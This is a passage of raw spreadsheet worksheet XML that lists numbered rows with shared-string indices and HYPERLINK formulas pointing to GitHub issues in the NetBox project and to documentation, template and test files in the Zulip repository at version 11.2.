        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/5468", "https://github.com/netbox-community/netbox/issues/5468")</f>
        <v>https://github.com/netbox-community/netbox/issues/5468</v>
      </c>
    </row>
    <row r="428" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A428">
        <v>812</v>
      </c>
      <c r="B428" t="s">
        <v>194</v>
      </c>
      <c r="C428" t="s">
        <v>447</v>
      </c>
      <c r="D428" t="s">
        <v>10</v>
      </c>
      <c r="E428" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/6606", "https://github.com/netbox-community/netbox/issues/6606")</f>
        <v>https://github.com/netbox-community/netbox/issues/6606</v>
      </c>
    </row>
    <row r="429" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A429">
        <v>813</v>
      </c>
      <c r="B429" t="s">
        <v>11</v>
      </c>
      <c r="C429" t="s">
        <v>448</v>
      </c>
      <c r="D429" t="s">
        <v>10</v>
      </c>
      <c r="E429" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/7246", "https://github.com/netbox-community/netbox/issues/7246")</f>
        <v>https://github.com/netbox-community/netbox/issues/7246</v>
      </c>
    </row>
    <row r="430" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A430">
        <v>814</v>
      </c>
      <c r="B430" t="s">
        <v>65</v>
      </c>
      <c r="C430" t="s">
        <v>448</v>
      </c>
      <c r="D430" t="s">
        <v>10</v>
      </c>
      <c r="E430" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/7246", "https://github.com/netbox-community/netbox/issues/7246")</f>
        <v>https://github.com/netbox-community/netbox/issues/7246</v>
      </c>
    </row>
    <row r="431" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A431">
        <v>815</v>
      </c>
      <c r="B431" t="s">
        <v>208</v>
      </c>
      <c r="C431" t="s">
        <v>449</v>
      </c>
      <c r="D431" t="s">
        <v>10</v>
      </c>
      <c r="E431" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/7292", "https://github.com/netbox-community/netbox/issues/7292")</f>
        <v>https://github.com/netbox-community/netbox/issues/7292</v>
      </c>
    </row>
    <row r="432" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A432">
        <v>816</v>
      </c>
      <c r="B432" t="s">
        <v>177</v>
      </c>
      <c r="C432" t="s">
        <v>450</v>
      </c>
      <c r="D432" t="s">
        <v>10</v>
      </c>
      <c r="E432" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/7788", "https://github.com/netbox-community/netbox/issues/7788")</f>
        <v>https://github.com/netbox-community/netbox/issues/7788</v>
      </c>
    </row>
    <row r="433" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A433">
        <v>819</v>
      </c>
      <c r="B433" t="s">
        <v>172</v>
      </c>
      <c r="C433" t="s">
        <v>451</v>
      </c>
      <c r="D433" t="s">
        <v>10</v>
      </c>
      <c r="E433" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/9122", "https://github.com/netbox-community/netbox/issues/9122")</f>
        <v>https://github.com/netbox-community/netbox/issues/9122</v>
      </c>
    </row>
    <row r="434" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A434">
        <v>820</v>
      </c>
      <c r="B434" t="s">
        <v>11</v>
      </c>
      <c r="C434" t="s">
        <v>452</v>
      </c>
      <c r="D434" t="s">
        <v>10</v>
      </c>
      <c r="E434" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/9480", "https://github.com/netbox-community/netbox/issues/9480")</f>
        <v>https://github.com/netbox-community/netbox/issues/9480</v>
      </c>
    </row>
    <row r="435" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A435">
        <v>821</v>
      </c>
      <c r="B435" t="s">
        <v>65</v>
      </c>
      <c r="C435" t="s">
        <v>453</v>
      </c>
      <c r="D435" t="s">
        <v>10</v>
      </c>
      <c r="E435" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/9480", "https://github.com/netbox-community/netbox/issues/9480")</f>
        <v>https://github.com/netbox-community/netbox/issues/9480</v>
      </c>
    </row>
    <row r="436" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A436">
        <v>826</v>
      </c>
      <c r="B436" t="s">
        <v>17</v>
      </c>
      <c r="C436" t="s">
        <v>454</v>
      </c>
      <c r="D436" t="s">
        <v>10</v>
      </c>
      <c r="E436" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/12534", "https://github.com/netbox-community/netbox/issues/12534")</f>
        <v>https://github.com/netbox-community/netbox/issues/12534</v>
      </c>
    </row>
    <row r="437" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A437">
        <v>829</v>
      </c>
      <c r="B437" t="s">
        <v>8</v>
      </c>
      <c r="C437" t="s">
        <v>455</v>
      </c>
      <c r="D437" t="s">
        <v>10</v>
      </c>
      <c r="E437" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/pull/15141", "https://github.com/netbox-community/netbox/pull/15141")</f>
        <v>https://github.com/netbox-community/netbox/pull/15141</v>
      </c>
    </row>
    <row r="438" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A438">
        <v>831</v>
      </c>
      <c r="B438" t="s">
        <v>17</v>
      </c>
      <c r="C438" t="s">
        <v>456</v>
      </c>
      <c r="D438" t="s">
        <v>10</v>
      </c>
      <c r="E438" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/16454", "https://github.com/netbox-community/netbox/issues/16454")</f>
        <v>https://github.com/netbox-community/netbox/issues/16454</v>
      </c>
    </row>
  </sheetData>
  <hyperlinks>
    <hyperlink ref="G5" r:id="rId1" display="https://github.com/zulip/zulip/pull/392/commits" xr:uid="{6D8A2F68-A6A6-F143-A171-4B5EB6E6150E}"/>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4"/>
  <sheetViews>
    <sheetView zoomScale="90" workbookViewId="0">
      <pane ySplit="1" topLeftCell="A55" activePane="bottomLeft" state="frozen"/>
      <selection pane="bottomLeft" activeCell="G84" sqref="G84"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="8.83203125" defaultRowHeight="15" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="5" max="5" width="61.6640625" customWidth="1"/>
    <col min="6" max="6" width="7" bestFit="1" customWidth="1"/>
    <col min="7" max="7" width="10.1640625" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:13" x14ac:dyDescent="0.2">
      <c r="A1" s="1" t="s">
        <v>0</v>
      </c>
      <c r="B1" s="1" t="s">
        <v>1</v>
      </c>
      <c r="C1" s="1" t="s">
        <v>2</v>
      </c>
      <c r="D1" s="1" t="s">
        <v>3</v>
      </c>
      <c r="E1" s="1" t="s">
        <v>4</v>
      </c>
      <c r="F1" s="1" t="s">
        <v>5</v>
      </c>
      <c r="G1" s="1" t="s">
        <v>6</v>
      </c>
      <c r="H1" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="2" spans="1:13" x14ac:dyDescent="0.2">
      <c r="A2">
        <v>0</v>
      </c>
      <c r="B2" t="s">
        <v>53</v>
      </c>
      <c r="C2" t="s">
        <v>457</v>
      </c>
      <c r="D2" t="s">
        <v>458</v>
      </c>
      <c r="E2" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/api_docs/http-headers.md", "https://github.com/zulip/zulip/tree/11.2/api_docs/http-headers.md")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/api_docs/http-headers.md</v>
      </c>
      <c r="M2" t="s">
        <v>810</v>
      </c>
    </row>
    <row r="3" spans="1:13" x14ac:dyDescent="0.2">
      <c r="A3">
        <v>1</v>
      </c>
      <c r="B3" t="s">
        <v>8</v>
      </c>
      <c r="C3" t="s">
        <v>459</v>
      </c>
      <c r="D3" t="s">
        <v>458</v>
      </c>
      <c r="E3" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/api_docs/http-headers.md", "https://github.com/zulip/zulip/tree/11.2/api_docs/http-headers.md")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/api_docs/http-headers.md</v>
      </c>
    </row>
    <row r="4" spans="1:13" x14ac:dyDescent="0.2">
      <c r="A4">
        <v>3</v>
      </c>
      <c r="B4" t="s">
        <v>17</v>
      </c>
      <c r="C4" t="s">
        <v>459</v>
      </c>
      <c r="D4" t="s">
        <v>458</v>
      </c>
      <c r="E4" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/api_docs/http-headers.md", "https://github.com/zulip/zulip/tree/11.2/api_docs/http-headers.md")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/api_docs/http-headers.md</v>
      </c>
    </row>
    <row r="5" spans="1:13" x14ac:dyDescent="0.2">
      <c r="A5">
        <v>5</v>
      </c>
      <c r="B5" t="s">
        <v>311</v>
      </c>
      <c r="C5" t="s">
        <v>460</v>
      </c>
      <c r="D5" t="s">
        <v>458</v>
      </c>
      <c r="E5" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/api_docs/real-time-events.md", "https://github.com/zulip/zulip/tree/11.2/api_docs/real-time-events.md")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/api_docs/real-time-events.md</v>
      </c>
    </row>
    <row r="6" spans="1:13" x14ac:dyDescent="0.2">
      <c r="A6">
        <v>6</v>
      </c>
      <c r="B6" t="s">
        <v>53</v>
      </c>
      <c r="C6" t="s">
        <v>461</v>
      </c>
      <c r="D6" t="s">
        <v>458</v>
      </c>
      <c r="E6" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/help/public-access-option.md", "https://github.com/zulip/zulip/tree/11.2/help/public-access-option.md")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/help/public-access-option.md</v>
      </c>
    </row>
    <row r="7" spans="1:13" x14ac:dyDescent="0.2">
      <c r="A7">
        <v>7</v>
      </c>
      <c r="B7" t="s">
        <v>53</v>
      </c>
      <c r="C7" t="s">
        <v>462</v>
      </c>
      <c r="D7" t="s">
        <v>458</v>
      </c>
      <c r="E7" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/docs/subsystems/email.md", "https://github.com/zulip/zulip/tree/11.2/docs/subsystems/email.md")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/docs/subsystems/email.md</v>
      </c>
    </row>
    <row r="8" spans="1:13" x14ac:dyDescent="0.2">
      <c r="A8">
        <v>8</v>
      </c>
      <c r="B8" t="s">
        <v>283</v>
      </c>
      <c r="C8" t="s">
        <v>463</v>
      </c>
      <c r="D8" t="s">
        <v>458</v>
      </c>
      <c r="E8" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/docs/subsystems/markdown.md", "https://github.com/zulip/zulip/tree/11.2/docs/subsystems/markdown.md")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/docs/subsystems/markdown.md</v>
      </c>
    </row>
    <row r="9" spans="1:13" x14ac:dyDescent="0.2">
      <c r="A9">
        <v>9</v>
      </c>
      <c r="B9" t="s">
        <v>152</v>
      </c>
      <c r="C9" t="s">
        <v>464</v>
      </c>
      <c r="D9" t="s">
        <v>458</v>
      </c>
      <c r="E9" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/docs/subsystems/events-system.md", "https://github.com/zulip/zulip/tree/11.2/docs/subsystems/events-system.md")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/docs/subsystems/events-system.md</v>
      </c>
    </row>
    <row r="10" spans="1:13" x14ac:dyDescent="0.2">
      <c r="A10">
        <v>10</v>
      </c>
      <c r="B10" t="s">
        <v>53</v>
      </c>
      <c r="C10" t="s">
        <v>465</v>
      </c>
      <c r="D10" t="s">
        <v>458</v>
      </c>
      <c r="E10" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/docs/production/email.md", "https://github.com/zulip/zulip/tree/11.2/docs/production/email.md")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/docs/production/email.md</v>
      </c>
    </row>
    <row r="11" spans="1:13" x14ac:dyDescent="0.2">
      <c r="A11">
        <v>11</v>
      </c>
      <c r="B11" t="s">
        <v>82</v>
      </c>
      <c r="C11" t="s">
        <v>466</v>
      </c>
      <c r="D11" t="s">
        <v>458</v>
      </c>
      <c r="E11" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/docs/production/requirements.md", "https://github.com/zulip/zulip/tree/11.2/docs/production/requirements.md")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/docs/production/requirements.md</v>
      </c>
    </row>
    <row r="12" spans="1:13" x14ac:dyDescent="0.2">
      <c r="A12">
        <v>12</v>
      </c>
      <c r="B12" t="s">
        <v>467</v>
      </c>
      <c r="C12" t="s">
        <v>468</v>
      </c>
      <c r="D12" t="s">
        <v>458</v>
      </c>
      <c r="E12" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/docs/production/requirements.md", "https://github.com/zulip/zulip/tree/11.2/docs/production/requirements.md")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/docs/production/requirements.md</v>
      </c>
    </row>
    <row r="13" spans="1:13" x14ac:dyDescent="0.2">
      <c r="A13">
        <v>14</v>
      </c>
      <c r="B13" t="s">
        <v>48</v>
      </c>
      <c r="C13" t="s">
        <v>469</v>
      </c>
      <c r="D13" t="s">
        <v>458</v>
      </c>
      <c r="E13" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/docs/production/management-commands.md", "https://github.com/zulip/zulip/tree/11.2/docs/production/management-commands.md")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/docs/production/management-commands.md</v>
      </c>
    </row>
    <row r="14" spans="1:13" x14ac:dyDescent="0.2">
      <c r="A14">
        <v>15</v>
      </c>
      <c r="B14" t="s">
        <v>82</v>
      </c>
      <c r="C14" t="s">
        <v>470</v>
      </c>
      <c r="D14" t="s">
        <v>458</v>
      </c>
      <c r="E14" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/docs/production/deployment.md", "https://github.com/zulip/zulip/tree/11.2/docs/production/deployment.md")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/docs/production/deployment.md</v>
      </c>
    </row>
    <row r="15" spans="1:13" x14ac:dyDescent="0.2">
      <c r="A15">
        <v>16</v>
      </c>
      <c r="B15" t="s">
        <v>467</v>
      </c>
      <c r="C15" t="s">
        <v>471</v>
      </c>
      <c r="D15" t="s">
        <v>458</v>
      </c>
      <c r="E15" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/docs/production/deployment.md", "https://github.com/zulip/zulip/tree/11.2/docs/production/deployment.md")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/docs/production/deployment.md</v>
      </c>
    </row>
    <row r="16" spans="1:13" x14ac:dyDescent="0.2">
      <c r="A16">
        <v>18</v>
      </c>
      <c r="B16" t="s">
        <v>278</v>
      </c>
      <c r="C16" t="s">
        <v>472</v>
      </c>
      <c r="D16" t="s">
        <v>458</v>
      </c>
      <c r="E16" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/docs/production/mobile-push-notifications.md", "https://github.com/zulip/zulip/tree/11.2/docs/production/mobile-push-notifications.md")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/docs/production/mobile-push-notifications.md</v>
      </c>
    </row>
    <row r="17" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A17">
        <v>19</v>
      </c>
      <c r="B17" t="s">
        <v>82</v>
      </c>
      <c r="C17" t="s">
        <v>473</v>
      </c>
      <c r="D17" t="s">
        <v>458</v>
      </c>
      <c r="E17" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/docs/production/security-model.md", "https://github.com/zulip/zulip/tree/11.2/docs/production/security-model.md")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/docs/production/security-model.md</v>
      </c>
    </row>
    <row r="18" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A18">
        <v>20</v>
      </c>
      <c r="B18" t="s">
        <v>467</v>
      </c>
      <c r="C18" t="s">
        <v>474</v>
      </c>
      <c r="D18" t="s">
        <v>458</v>
      </c>
      <c r="E18" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/docs/production/security-model.md", "https://github.com/zulip/zulip/tree/11.2/docs/production/security-model.md")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/docs/production/security-model.md</v>
      </c>
    </row>
    <row r="19" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A19">
        <v>22</v>
      </c>
      <c r="B19" t="s">
        <v>79</v>
      </c>
      <c r="C19" t="s">
        <v>475</v>
      </c>
      <c r="D19" t="s">
        <v>458</v>
      </c>
      <c r="E19" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/docs/production/security-model.md", "https://github.com/zulip/zulip/tree/11.2/docs/production/security-model.md")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/docs/production/security-model.md</v>
      </c>
    </row>
    <row r="20" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A20">
        <v>23</v>
      </c>
      <c r="B20" t="s">
        <v>17</v>
      </c>
      <c r="C20" t="s">
        <v>476</v>
      </c>
      <c r="D20" t="s">
        <v>458</v>
      </c>
      <c r="E20" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/docs/production/security-model.md", "https://github.com/zulip/zulip/tree/11.2/docs/production/security-model.md")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/docs/production/security-model.md</v>
      </c>
    </row>
    <row r="21" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A21">
        <v>27</v>
      </c>
      <c r="B21" t="s">
        <v>8</v>
      </c>
      <c r="C21" t="s">
        <v>477</v>
      </c>
      <c r="D21" t="s">
        <v>458</v>
      </c>
      <c r="E21" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/docs/production/security-model.md", "https://github.com/zulip/zulip/tree/11.2/docs/production/security-model.md")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/docs/production/security-model.md</v>
      </c>
    </row>
    <row r="22" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A22">
        <v>29</v>
      </c>
      <c r="B22" t="s">
        <v>17</v>
      </c>
      <c r="C22" t="s">
        <v>478</v>
      </c>
      <c r="D22" t="s">
        <v>458</v>
      </c>
      <c r="E22" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/docs/tutorials/life-of-a-request.md", "https://github.com/zulip/zulip/tree/11.2/docs/tutorials/life-of-a-request.md")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/docs/tutorials/life-of-a-request.md</v>
      </c>
    </row>
    <row r="23" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A23">
        <v>30</v>
      </c>
      <c r="B23" t="s">
        <v>479</v>
      </c>
      <c r="C23" t="s">
        <v>480</v>
      </c>
      <c r="D23" t="s">
        <v>458</v>
      </c>
      <c r="E23" t="str">
        <f t="shared" ref="E23:E31" si="0">HYPERLINK("https://github.com/zulip/zulip/tree/11.2/docs/overview/changelog.md", "https://github.com/zulip/zulip/tree/11.2/docs/overview/changelog.md")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/docs/overview/changelog.md</v>
      </c>
    </row>
    <row r="24" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A24">
        <v>31</v>
      </c>
      <c r="B24" t="s">
        <v>8</v>
      </c>
      <c r="C24" t="s">
        <v>481</v>
      </c>
      <c r="D24" t="s">
        <v>458</v>
      </c>
      <c r="E24" t="str">
        <f t="shared" si="0"/>
        <v>https://github.com/zulip/zulip/tree/11.2/docs/overview/changelog.md</v>
      </c>
    </row>
    <row r="25" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A25">
        <v>32</v>
      </c>
      <c r="B25" t="s">
        <v>152</v>
      </c>
      <c r="C25" t="s">
        <v>482</v>
      </c>
      <c r="D25" t="s">
        <v>458</v>
      </c>
      <c r="E25" t="str">
        <f t="shared" si="0"/>
        <v>https://github.com/zulip/zulip/tree/11.2/docs/overview/changelog.md</v>
      </c>
    </row>
    <row r="26" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A26">
        <v>33</v>
      </c>
      <c r="B26" t="s">
        <v>79</v>
      </c>
      <c r="C26" t="s">
        <v>483</v>
      </c>
      <c r="D26" t="s">
        <v>458</v>
      </c>
      <c r="E26" t="str">
        <f t="shared" si="0"/>
        <v>https://github.com/zulip/zulip/tree/11.2/docs/overview/changelog.md</v>
      </c>
    </row>
    <row r="27" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A27">
        <v>34</v>
      </c>
      <c r="B27" t="s">
        <v>17</v>
      </c>
      <c r="C27" t="s">
        <v>484</v>
      </c>
      <c r="D27" t="s">
        <v>458</v>
      </c>
      <c r="E27" t="str">
        <f t="shared" si="0"/>
        <v>https://github.com/zulip/zulip/tree/11.2/docs/overview/changelog.md</v>
      </c>
    </row>
    <row r="28" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A28">
        <v>35</v>
      </c>
      <c r="B28" t="s">
        <v>82</v>
      </c>
      <c r="C28" t="s">
        <v>485</v>
      </c>
      <c r="D28" t="s">
        <v>458</v>
      </c>
      <c r="E28" t="str">
        <f t="shared" si="0"/>
        <v>https://github.com/zulip/zulip/tree/11.2/docs/overview/changelog.md</v>
      </c>
    </row>
    <row r="29" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A29">
        <v>37</v>
      </c>
      <c r="B29" t="s">
        <v>53</v>
      </c>
      <c r="C29" t="s">
        <v>486</v>
      </c>
      <c r="D29" t="s">
        <v>458</v>
      </c>
      <c r="E29" t="str">
        <f t="shared" si="0"/>
        <v>https://github.com/zulip/zulip/tree/11.2/docs/overview/changelog.md</v>
      </c>
    </row>
    <row r="30" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A30">
        <v>41</v>
      </c>
      <c r="B30" t="s">
        <v>487</v>
      </c>
      <c r="C30" t="s">
        <v>488</v>
      </c>
      <c r="D30" t="s">
        <v>458</v>
      </c>
      <c r="E30" t="str">
        <f t="shared" si="0"/>
        <v>https://github.com/zulip/zulip/tree/11.2/docs/overview/changelog.md</v>
      </c>
    </row>
    <row r="31" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A31">
        <v>42</v>
      </c>
      <c r="B31" t="s">
        <v>11</v>
      </c>
      <c r="C31" t="s">
        <v>489</v>
      </c>
      <c r="D31" t="s">
        <v>458</v>
      </c>
      <c r="E31" t="str">
        <f t="shared" si="0"/>
        <v>https://github.com/zulip/zulip/tree/11.2/docs/overview/changelog.md</v>
      </c>
    </row>
    <row r="32" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A32">
        <v>44</v>
      </c>
      <c r="B32" t="s">
        <v>17</v>
      </c>
      <c r="C32" t="s">
        <v>490</v>
      </c>
      <c r="D32" t="s">
        <v>458</v>
      </c>
      <c r="E32" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/docs/overview/architecture-overview.md", "https://github.com/zulip/zulip/tree/11.2/docs/overview/architecture-overview.md")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/docs/overview/architecture-overview.md</v>
      </c>
    </row>
    <row r="33" spans="1:16" x14ac:dyDescent="0.2">
      <c r="A33">
        <v>45</v>
      </c>
      <c r="B33" t="s">
        <v>17</v>
      </c>
      <c r="C33" t="s">
        <v>491</v>
      </c>
      <c r="D33" t="s">
        <v>458</v>
      </c>
      <c r="E33" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/templates/corporate/security.md", "https://github.com/zulip/zulip/tree/11.2/templates/corporate/security.md")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/templates/corporate/security.md</v>
      </c>
    </row>
    <row r="34" spans="1:16" x14ac:dyDescent="0.2">
      <c r="A34">
        <v>46</v>
      </c>
      <c r="B34" t="s">
        <v>53</v>
      </c>
      <c r="C34" t="s">
        <v>492</v>
      </c>
      <c r="D34" t="s">
        <v>458</v>
      </c>
      <c r="E34" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/templates/corporate/policies/rules.md", "https://github.com/zulip/zulip/tree/11.2/templates/corporate/policies/rules.md")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/templates/corporate/policies/rules.md</v>
      </c>
    </row>
    <row r="35" spans="1:16" x14ac:dyDescent="0.2">
      <c r="A35">
        <v>47</v>
      </c>
      <c r="B35" t="s">
        <v>53</v>
      </c>
      <c r="C35" t="s">
        <v>493</v>
      </c>
      <c r="D35" t="s">
        <v>458</v>
      </c>
      <c r="E35" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/templates/corporate/comparison_table_integrated.html", "https://github.com/zulip/zulip/tree/11.2/templates/corporate/comparison_table_integrated.html")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/templates/corporate/comparison_table_integrated.html</v>
      </c>
    </row>
    <row r="36" spans="1:16" x14ac:dyDescent="0.2">
      <c r="A36">
        <v>48</v>
      </c>
      <c r="B36" t="s">
        <v>223</v>
      </c>
      <c r="C36" t="s">
        <v>494</v>
      </c>
      <c r="D36" t="s">
        <v>458</v>
      </c>
      <c r="E36" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/templates/corporate/billing/remote_server_rate_limit_exceeded.html", "https://github.com/zulip/zulip/tree/11.2/templates/corporate/billing/remote_server_rate_limit_exceeded.html")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/templates/corporate/billing/remote_server_rate_limit_exceeded.html</v>
      </c>
    </row>
    <row r="37" spans="1:16" x14ac:dyDescent="0.2">
      <c r="A37">
        <v>50</v>
      </c>
      <c r="B37" t="s">
        <v>223</v>
      </c>
      <c r="C37" t="s">
        <v>495</v>
      </c>
      <c r="D37" t="s">
        <v>458</v>
      </c>
      <c r="E37" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/templates/zerver/portico_error_pages/rate_limit_exceeded.html", "https://github.com/zulip/zulip/tree/11.2/templates/zerver/portico_error_pages/rate_limit_exceeded.html")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/templates/zerver/portico_error_pages/rate_limit_exceeded.html</v>
      </c>
    </row>
    <row r="38" spans="1:16" x14ac:dyDescent="0.2">
      <c r="A38">
        <v>54</v>
      </c>
      <c r="B38" t="s">
        <v>8</v>
      </c>
      <c r="C38" t="s">
        <v>496</v>
      </c>
      <c r="D38" t="s">
        <v>497</v>
      </c>
      <c r="E38" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/corporate/tests/test_remote_billing.py", "https://github.com/zulip/zulip/tree/11.2/corporate/tests/test_remote_billing.py")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/corporate/tests/test_remote_billing.py</v>
      </c>
      <c r="F38" s="4" t="s">
        <v>811</v>
      </c>
      <c r="G38" t="s">
        <v>812</v>
      </c>
      <c r="H38" t="s">
        <v>813</v>
      </c>
      <c r="O38" s="3"/>
      <c r="P38" s="2"/>
    </row>
    <row r="39" spans="1:16" x14ac:dyDescent="0.2">
      <c r="A39">
        <v>55</v>
      </c>
      <c r="B39" t="s">
        <v>17</v>
      </c>
      <c r="C39" t="s">
        <v>496</v>
      </c>
      <c r="D39" t="s">
        <v>497</v>
      </c>
      <c r="E39" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/corporate/tests/test_remote_billing.py", "https://github.com/zulip/zulip/tree/11.2/corporate/tests/test_remote_billing.py")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/corporate/tests/test_remote_billing.py</v>
      </c>
      <c r="F39" t="s">
        <v>811</v>
      </c>
      <c r="H39" t="s">
        <v>814</v>
      </c>
    </row>
    <row r="40" spans="1:16" x14ac:dyDescent="0.2">
      <c r="A40">
        <v>61</v>
      </c>
      <c r="B40" t="s">
        <v>327</v>
      </c>
      <c r="C40" t="s">
        <v>498</v>
      </c>
      <c r="D40" t="s">
        <v>497</v>
      </c>
      <c r="E40" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/corporate/views/remote_activity.py", "https://github.com/zulip/zulip/tree/11.2/corporate/views/remote_activity.py")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/corporate/views/remote_activity.py</v>
      </c>
      <c r="F40" t="s">
        <v>815</v>
      </c>
      <c r="H40" t="s">
        <v>816</v>
      </c>
    </row>
    <row r="41" spans="1:16" x14ac:dyDescent="0.2">
      <c r="A41">
        <v>62</v>
      </c>
      <c r="B41" t="s">
        <v>42</v>
      </c>
      <c r="C41" t="s">
        <v>499</v>
      </c>
      <c r="D41" t="s">
        <v>497</v>
      </c>
      <c r="E41" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/tools/documentation_crawler/documentation_crawler/settings.py", "https://github.com/zulip/zulip/tree/11.2/tools/documentation_crawler/documentation_crawler/settings.py")</f>
        <v>https://github.com/zulip/zulip/tree/11.2/tools/documentation_crawler/documentation_crawler/settings.py</v>
      </c>
      <c r="F41" s="4" t="s">
        <v>818</v>
      </c>
      <c r="H41" t="s">
        <v>817</v>
      </c>
    </row>
    <row r="42" spans="1:16" x14ac:dyDescent="0.2">
      <c r="A42">
        <v>63</v>
      </c>
      <c r="B42" t="s">
        <v>17</v>
      </c>
      <c r="C42" t="s">
        <v>500</v>
      </c>
      <c r="D42" t="s">
        <v>497</v>
      </c>
      <c r="E42" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/tree/11.2/tools/documentation_crawler/documentation_crawler/spiders/common/spiders.py", "https://github.com/zulip/zulip/tree/11.2/tools/documentation_crawler/documentation_crawler/spiders/common/spiders.py")</f>
